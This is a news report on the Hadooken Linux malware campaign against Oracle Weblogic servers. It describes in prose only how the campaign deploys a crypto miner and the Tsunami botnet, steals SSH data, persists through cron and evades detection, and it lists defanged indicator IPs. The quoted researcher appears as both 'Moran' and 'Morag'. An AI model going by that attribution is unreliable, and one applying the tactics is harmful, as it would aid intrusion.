New Linux Malware Campaign Exploits Oracle Weblogic to Mine Cryptocurrency

Cybersecurity experts have found a new malware operation targeting Linux platforms to perform illegal cryptocurrency mining and deploy botnet malware.

The activity, which particularly picks out the Oracle Weblogic server, is aimed to spread a malware strain named Hadooken, according to cloud security vendor Aqua.

"When Hadooken is executed, it drops a Tsunami malware and deploys a crypto miner," security researcher Assaf Moran stated.

The attack chains use existing security flaws and misconfigurations, such as weak credentials, to acquire an initial foothold and execute arbitrary code on vulnerable instances.

This is performed by releasing two nearly-identical payloads, one written in Python and the other, a shell script, both of which are responsible for collecting the Hadooken malware from a remote server ("89.185.85[.]102" or "185.174.136[.]204").

"In addition, the shell script version attempts to iterate over various directories containing SSH data (such as user credentials, host information, and secrets) and uses this information to attack known servers," Morag stated.

"It then moves laterally across the organization or connected environments to further spread the Hadooken malware. "

Hadooken is bundled with two components, a bitcoin miner and a distributed denial-of-service (DDoS) botnet dubbed Tsunami (aka Kaiten), which has a history of targeting Jenkins and Weblogic services deployed on Kubernetes clusters.

Furthermore, the virus is responsible for building persistence on the host by setting cron tasks to execute the crypto miner repeatedly at varied intervals.

Hadooken's defense evasion capabilities are realized through a combination of tactics that involve the use of Base64-encoded payloads, dropping the miner payloads under innocuous names like "bash" and "java" to blend in with legitimate processes, and artifact deletion after execution to hide any signs of malicious activity.

Aqua noted that the IP address 89.185.85[.]102 is registered in Germany under the hosting company Aeza International LTD (AS210644), with a previous report from Uptycs in February 2024 linking it to an 8220 Gang cryptocurrency campaign that abused flaws in Apache Log4j and Atlassian Confluence Server and Data Center.

The second IP address 185.174.136[.]204, although presently inactive, is likewise related to Aeza Group Ltd. (AS216246). As emphasized by Qurium and EU DisinfoLab in July 2024, Aeza is a bulletproof hosting service provider with a presence in Moscow M9 and in two data centers in Frankfurt.

"The modus operandi of Aeza and its fast growth can be explained by the recruitment of young developers affiliated to bulletproof hosting providers in Russia offering shelter to cybercrime," the researchers noted in the paper.